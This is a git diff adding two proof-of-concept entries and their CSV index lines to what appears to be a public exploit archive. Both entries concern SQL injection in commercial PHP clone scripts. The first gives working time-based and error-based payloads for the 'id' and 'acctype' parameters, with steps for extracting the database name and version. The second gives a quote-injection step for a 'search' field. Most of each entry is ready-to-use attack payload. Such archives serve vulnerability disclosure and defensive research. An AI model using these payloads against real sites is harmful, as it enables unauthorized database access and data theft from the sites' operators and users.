diff --git a/exploits/php/webapps/44017.txt b/exploits/php/webapps/44017.txt new file mode 100644 index 000000000..8d29a2ae4 --- /dev/null +++ b/exploits/php/webapps/44017.txt @@ -0,0 +1,36 @@ +# Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection +# Dork: N/A +# Date: 2018-02-10 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/ +# Version: 1.0.9 +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands. +# # # # # +# Proof of Concept : + +SQLI : + +http://localhost/PATH/registrationpersonal.php?id=[SQL] + +# Parameter : id (GET) +# Type: Type: AND/OR time-based blind +# Title: MySQL >= 5.0.50 AND time-based blind +# Payload: AND SLEEP(10) + +######################################################### + +http://localhost/PATH/registrationmail.php?acctype=[SQL] + +# Parameter : acctype (GET) +# Type : Error based +# Title : MySQL >= 5.0 AND error based - Extractvalue (XPATH query) +# Payload : 1' and +extractvalue(1,/*!00000Concat(0x3a,database(),0x3a,0x3a,version())*/)%23 + +# Description: First inject payload into parameter and load URL . then fill all fields and click "continue". +# You will have version and db_name in the next page . You can find all tables using XPATH query and see result in the next page . \ No newline at end of file diff --git a/exploits/php/webapps/44018.txt b/exploits/php/webapps/44018.txt new file mode 100644 index 000000000..0acaa3fcc --- /dev/null +++ b/exploits/php/webapps/44018.txt @@ -0,0 +1,23 @@ +################################################################## +# Exploit Title: Readymade Video Sharing Script - SQL Injection (Error Based) +# Google Dork: NA +# Date: 10.02.2018 +# Exploit Author: Varun Bagaria +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ +# Version: 3.2 +# Tested on: Windows 7 +# Category: Webapps +# CVE : NA +################################################################## + +Proof of Concept +================= + +Attack Parameter : search +Payload : ' + +Reproduction Steps: +------------------------------ +1. Access the website +2. In the search bar insert ' and you will get error based SQL Injection \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a282fda74..ab2480fdb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38023,6 +38023,8 @@ id,file,description,date,author,type,platform,port 44014,exploits/php/webapps/44014.txt,"Select Your College Script 2.0.2 - Authentication Bypass",2018-02-10,"Prasenjit Kanti Paul",webapps,php, 44015,exploits/php/webapps/44015.txt,"Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting",2018-02-10,"Prasenjit Kanti Paul",webapps,php, 44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php, +44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php, +44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80